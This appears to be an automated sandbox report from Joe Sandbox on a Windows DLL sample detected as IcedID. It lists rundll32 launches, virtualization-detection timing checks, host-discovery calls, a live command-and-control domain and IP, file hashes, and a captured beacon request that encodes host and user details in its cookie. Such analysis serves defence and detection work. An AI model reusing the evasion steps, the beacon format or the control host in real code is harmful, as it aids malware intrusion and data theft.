    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfCJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOluJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpjJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfCJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOluJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpjJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNgJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlWJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1Jump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winDLL@21/0@1/1
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: y2D56.tmp.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: y2D56.tmp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: y2D56.tmp.dllStatic PE information: real checksum: 0x59d91 should be: 0x654aa
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C58BC2 push rax; ret 3_2_00007FFA65C58BDE
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C5610E push rdx; ret 3_2_00007FFA65C5611B
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000108C
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread,3_2_0000000180002AC0
    Source: C:\Windows\System32\loaddll64.exe TID: 4980Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000133C
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002174 rdtsc 3_2_0000000180002174
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000108C
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_0000000180001C28
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002174 rdtsc 3_2_0000000180002174

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,3_2_0000000180002018

    Stealing of Sensitive Information

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    Remote Access Functionality

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API    		Path Interception111
    Process Injection    		11
    Virtualization/Sandbox Evasion    		OS Credential Dumping221
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
    Process Injection    		LSASS Memory11
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Rundll32    		NTDS1
    System Owner/User Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Remote System Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
    System Network Configuration Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync22
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    y2D56.tmp.dll14%VirustotalBrowse
    y2D56.tmp.dll100%AviraHEUR/AGEN.1251556

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    3.2.rundll32.exe.7ffa65c50000.2.unpack100%AviraHEUR/AGEN.1251556Download File
    3.2.rundll32.exe.180000000.0.unpack100%AviraHEUR/AGEN.1205098Download File

    Domains

    SourceDetectionScannerLabelLink
    alexbionka.com9%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    alexbionka.com100%Avira URL Cloudmalware
    http://alexbionka.com/QpkO100%Avira URL Cloudmalware
    http://alexbionka.com/100%Avira URL Cloudmalware
    http://alexbionka.com/UN100%Avira URL Cloudmalware
    http://alexbionka.com:80/h100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alexbionka.com
    		64.227.108.27
    		truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    alexbionka.comtrue
    • Avira URL Cloud: malware
    		unknown
    http://alexbionka.com/true
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://alexbionka.com/QpkOrundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://alexbionka.com/UNrundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://alexbionka.com:80/hrundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    64.227.108.27
    		alexbionka.comUnited States
    		14061DIGITALOCEAN-ASNUStrue

    General Information

    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682775
    Start date and time:2022-08-12 00:27:08 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 3m 42s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:y2D56.tmp.dll
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winDLL@21/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 77.7% (good quality ratio 58.6%)
    • Quality average: 55.7%
    • Quality standard deviation: 38.8%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 15
    • Number of non-executed functions: 12
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Adjust boot time
    • Enable AMSI
    • Stop behavior analysis, all processes terminated

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtProtectVirtualMemory calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    00:28:21API Interceptor1x Sleep call for process: rundll32.exe modified
    00:28:21API Interceptor1x Sleep call for process: loaddll64.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    64.227.108.27b344f6ec29c583fd85fc2683ea84877c8c6dc76544344.dllGet hashmaliciousBrowse
    • alexbionka.com/
    0341825bbb5afc42fbcb1b19fa5ec3b3c7113a0a339c5.dllGet hashmaliciousBrowse
    • alexbionka.com/
    0c467887690edf5eef381c24429081e217cc61c84a756.dllGet hashmaliciousBrowse
    • alexbionka.com/
    sul7npe.dllGet hashmaliciousBrowse
    • alexbionka.com/
    7c5dbe5850bb0c970520eddfb08996a1d0d5adebbd44c.dllGet hashmaliciousBrowse
    • alexbionka.com/
    01788bbf12799bd7f3c2b60435dd1bb55623ed93af37d.dllGet hashmaliciousBrowse
    • alexbionka.com/
    cd0afa2d9e9e580161aa098790c3652a6f800eaff9495.dllGet hashmaliciousBrowse
    • alexbionka.com/
    32XiAE7rPd.dllGet hashmaliciousBrowse
    • alexbionka.com/
    7497031283fba2efea63a2bbb9c3a7f34de71b4d21ec8.dllGet hashmaliciousBrowse
    • alexbionka.com/
    260843dfc104b26265438f90bc6640924bf3179ee0767.dllGet hashmaliciousBrowse
    • alexbionka.com/
    391863eea5a75239da3660bf63bc970af20f91bdd6ef8.dllGet hashmaliciousBrowse
    • alexbionka.com/
    e283d15da163100acb2692d8c582498429bbb8f4e8152.dllGet hashmaliciousBrowse
    • alexbionka.com/
    sul7npe.dllGet hashmaliciousBrowse
    • alexbionka.com/
    WdEcgER9uA.dllGet hashmaliciousBrowse
    • alexbionka.com/
    009de31749098dcd24ecfb6ee705ca9c8b0fae12b8f43.dllGet hashmaliciousBrowse
    • alexbionka.com/
    0ec727e1b51ed3bbe1a65ee3c9e24ff2bc2f6decb7cff.dllGet hashmaliciousBrowse
    • alexbionka.com/
    f6768d8111b76e2b8e66469e609b0f282b0374e84b321.dllGet hashmaliciousBrowse
    • alexbionka.com/
    29a011ab62f7af474a0a5cb2903bfea1891f53eb1624b.dllGet hashmaliciousBrowse
    • alexbionka.com/
    ac6d3586e5b0bba61c4e511a066a241a6016119184416.dllGet hashmaliciousBrowse
    • alexbionka.com/
    courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
    • alexbionka.com/

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    alexbionka.comb344f6ec29c583fd85fc2683ea84877c8c6dc76544344.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0341825bbb5afc42fbcb1b19fa5ec3b3c7113a0a339c5.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0c467887690edf5eef381c24429081e217cc61c84a756.dllGet hashmaliciousBrowse
    • 64.227.108.27
    sul7npe.dllGet hashmaliciousBrowse
    • 64.227.108.27
    7c5dbe5850bb0c970520eddfb08996a1d0d5adebbd44c.dllGet hashmaliciousBrowse
    • 64.227.108.27
    01788bbf12799bd7f3c2b60435dd1bb55623ed93af37d.dllGet hashmaliciousBrowse
    • 64.227.108.27
    cd0afa2d9e9e580161aa098790c3652a6f800eaff9495.dllGet hashmaliciousBrowse
    • 64.227.108.27
    32XiAE7rPd.dllGet hashmaliciousBrowse
    • 64.227.108.27
    7497031283fba2efea63a2bbb9c3a7f34de71b4d21ec8.dllGet hashmaliciousBrowse
    • 64.227.108.27
    260843dfc104b26265438f90bc6640924bf3179ee0767.dllGet hashmaliciousBrowse
    • 64.227.108.27
    391863eea5a75239da3660bf63bc970af20f91bdd6ef8.dllGet hashmaliciousBrowse
    • 64.227.108.27
    e283d15da163100acb2692d8c582498429bbb8f4e8152.dllGet hashmaliciousBrowse
    • 64.227.108.27
    sul7npe.dllGet hashmaliciousBrowse
    • 64.227.108.27
    WdEcgER9uA.dllGet hashmaliciousBrowse
    • 64.227.108.27
    009de31749098dcd24ecfb6ee705ca9c8b0fae12b8f43.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0ec727e1b51ed3bbe1a65ee3c9e24ff2bc2f6decb7cff.dllGet hashmaliciousBrowse
    • 64.227.108.27
    f6768d8111b76e2b8e66469e609b0f282b0374e84b321.dllGet hashmaliciousBrowse
    • 64.227.108.27
    29a011ab62f7af474a0a5cb2903bfea1891f53eb1624b.dllGet hashmaliciousBrowse
    • 64.227.108.27
    ac6d3586e5b0bba61c4e511a066a241a6016119184416.dllGet hashmaliciousBrowse
    • 64.227.108.27
    courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
    • 64.227.108.27

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    DIGITALOCEAN-ASNUShttp://worldstreams.netGet hashmaliciousBrowse
    • 45.55.96.63
    b344f6ec29c583fd85fc2683ea84877c8c6dc76544344.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0341825bbb5afc42fbcb1b19fa5ec3b3c7113a0a339c5.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0c467887690edf5eef381c24429081e217cc61c84a756.dllGet hashmaliciousBrowse
    • 64.227.108.27
    sul7npe.dllGet hashmaliciousBrowse
    • 64.227.108.27
    7c5dbe5850bb0c970520eddfb08996a1d0d5adebbd44c.dllGet hashmaliciousBrowse
    • 64.227.108.27
    01788bbf12799bd7f3c2b60435dd1bb55623ed93af37d.dllGet hashmaliciousBrowse
    • 64.227.108.27
    cd0afa2d9e9e580161aa098790c3652a6f800eaff9495.dllGet hashmaliciousBrowse
    • 64.227.108.27
    32XiAE7rPd.dllGet hashmaliciousBrowse
    • 64.227.108.27
    7497031283fba2efea63a2bbb9c3a7f34de71b4d21ec8.dllGet hashmaliciousBrowse
    • 64.227.108.27
    260843dfc104b26265438f90bc6640924bf3179ee0767.dllGet hashmaliciousBrowse
    • 64.227.108.27
    391863eea5a75239da3660bf63bc970af20f91bdd6ef8.dllGet hashmaliciousBrowse
    • 64.227.108.27
    e283d15da163100acb2692d8c582498429bbb8f4e8152.dllGet hashmaliciousBrowse
    • 64.227.108.27
    sul7npe.dllGet hashmaliciousBrowse
    • 64.227.108.27
    WdEcgER9uA.dllGet hashmaliciousBrowse
    • 64.227.108.27
    009de31749098dcd24ecfb6ee705ca9c8b0fae12b8f43.dllGet hashmaliciousBrowse
    • 64.227.108.27
    0ec727e1b51ed3bbe1a65ee3c9e24ff2bc2f6decb7cff.dllGet hashmaliciousBrowse
    • 64.227.108.27
    f6768d8111b76e2b8e66469e609b0f282b0374e84b321.dllGet hashmaliciousBrowse
    • 64.227.108.27
    29a011ab62f7af474a0a5cb2903bfea1891f53eb1624b.dllGet hashmaliciousBrowse
    • 64.227.108.27
    ac6d3586e5b0bba61c4e511a066a241a6016119184416.dllGet hashmaliciousBrowse
    • 64.227.108.27

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Entropy (8bit):4.6693263018201145
    TrID:
    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
    • Win64 Executable (generic) (12005/4) 10.17%
    • Generic Win/DOS Executable (2004/3) 1.70%
    • DOS Executable Generic (2002/1) 1.70%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
    File name:y2D56.tmp.dll
    File size:360448
    MD5:363777daf36e9534762d30bd4bf22c74
    SHA1:ea94d9afd355dd23a069f21b3562d85a4266da4f
    SHA256:8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
    SHA512:c8cac2963c8454890483823738e5adcaee4e945839b64d241d545d3dbc9a798fba7d923eb764cb455db2d27992915cd5f6ef9fae0b05175b7f8ae9669db93d53
    SSDEEP:6144:RYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:SCwMfjSlE+A4eguRJDtPZIG46FkEH9
    TLSH:6674AFB8F704A9E7D52E527BCA96BCD903722E629FCAD9CD416477C305A3725FE02804
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3.....Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x.................

    File Icon

    Icon Hash:74f0e4ecccdce0e4

    Static PE Info

    General

    Entrypoint:0x180000000
    Entrypoint Section:
    Digitally signed:false
    Imagebase:0x180000000
    Subsystem:windows cui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x62F4D159 [Thu Aug 11 09:52:25 2022 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:0
    File Version Major:6
    File Version Minor:0
    Subsystem Version Major:6
    Subsystem Version Minor:0
    Import Hash:

    Entrypoint Preview

    Instruction
    dec ebp
    pop edx
    nop
    add byte ptr [ebx], al
    add byte ptr [eax], al
    add byte ptr [eax+eax], al
    add byte ptr [eax], al

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x590000x17d.rdata
    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x1e0.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x577140x57800False0.5704436383928572DOS executable (COM)4.650785896133885IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x590000x17d0x200False0.63671875data4.436426000455931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc0x5a0000x1e00x200False0.53125data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_MANIFEST0x5a0600x17dXML 1.0 document textEnglishUnited States

    Exports

    NameOrdinalAddress
    JfUksQmDGYQRSQfC20x180009422
    MVeMOgOlu30x1800098fa
    OnqcowdLVOpj40x18000986e
    aXXRQNg50x180009bee
    agetCYHzlW60x180009487
    bbMIBZKkpJrSw70x18000976d
    nvWxVSzNIh80x180009532
    onXyNAQeqW90x180009b56
    qBYCIPM100x180009d39
    raiafa110x180009a6f
    ryiLrNIWKPUxQAhG120x1800096ea
    tndPRjog130x18000944d
    vGGAkgKOkEwmNdGA140x1800095f0
    zBiUZzLtC150x1800099c1
    ztyasufasklfmjnaks10x18000105e

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Aug 12, 2022 00:28:21.351857901 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.527837992 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:21.527980089 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.528403997 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.702569008 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:22.168242931 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:22.288031101 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:23.504345894 CEST4971680192.168.2.564.227.108.27

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Aug 12, 2022 00:28:21.294488907 CEST5974653192.168.2.58.8.8.8
    Aug 12, 2022 00:28:21.317162991 CEST53597468.8.8.8192.168.2.5

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Aug 12, 2022 00:28:21.294488907 CEST192.168.2.58.8.8.80x8425Standard query (0)alexbionka.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Aug 12, 2022 00:28:21.317162991 CEST8.8.8.8192.168.2.50x8425No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • alexbionka.com

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.54971664.227.108.2780C:\Windows\System32\rundll32.exe
    TimestampkBytes transferredDirectionData
    Aug 12, 2022 00:28:21.528403997 CEST92OUTGET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876
